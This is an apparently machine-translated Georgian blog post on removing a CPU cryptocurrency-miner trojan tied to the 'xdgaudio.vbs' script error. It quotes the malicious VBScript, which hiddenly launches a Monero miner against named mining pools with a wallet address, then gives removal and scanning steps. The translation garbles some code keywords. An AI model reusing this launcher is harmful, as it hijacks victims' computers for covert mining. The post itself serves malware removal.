თუ თქვენ იღებთ შემდეგ შეცდომის შეტყობინებას „xdgaudio.vbs“-თან დაკავშირებით თქვენს სისტემაში, მაშინ თქვენი კომპიუტერი სავარაუდოდ ინფიცირებულია.
სკრიპტი: C:\windows\xdgaudio.vbs
ხაზი: 3
Char: 1
შეცდომა: სისტემა ვერ პოულობს მითითებულ ფაილს.
კოდი: 80070002
წყარო: (null)
Notepad-ით რედაქტირებისას სკრიპტი შეიძლება შეიცავდეს ხაზებს, როგორიცაა ქვემოთ:
Dim WShell. დააყენეთ WShell = CreateObject ("WScript. ჭურვი") WShell. გაუშვით "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com: 8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv. აპლიკაცია -p x -k -o stratum+tcp://mine.moneropool.com: 3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bKgR7V5Q -p x", 0. დააყენეთ WShell = არაფერი
ეს, რა თქმა უნდა, ჰგავს CPU/კრიპტოვალუტის Miner ტროას, რომელიც არა მხოლოდ ანელებს თქვენს კომპიუტერს, არამედ შეიძლება საფრთხე შეუქმნას უსაფრთხოებას. სკრიპტის ფაილები
c:\windows\xdgaudio.vbs და c:\windows\servicecrsssr.vbs უნდა წაიშალოს. Ეს არ არის საკმარისი. ჩაატარეთ საფუძვლიანი სკანირება Malwarebytes antimalware-ის გამოყენებით და ასევე დაასკანირეთ ანტივირუსით, რომელსაც იყენებთ.ასეთი Miner Trojan-ის ამოღების შესახებ დეტალური ინსტრუქციებისთვის იხილეთ malwaretips.com სახელმძღვანელო როგორ ამოიღოთ CPU Miner Trojan Windows-იდან (ვირუსის დახმარების სახელმძღვანელო).
ერთი პატარა მოთხოვნა: თუ მოგეწონათ ეს პოსტი, გთხოვთ გააზიაროთ?
თქვენგან ერთი "პატარა" გაზიარება სერიოზულად დაგეხმარება ამ ბლოგის ზრდაში. რამდენიმე შესანიშნავი წინადადება:- ჩამაგრება!
- გააზიარეთ ის თქვენს საყვარელ ბლოგზე + Facebook, Reddit
- ტვიტერში!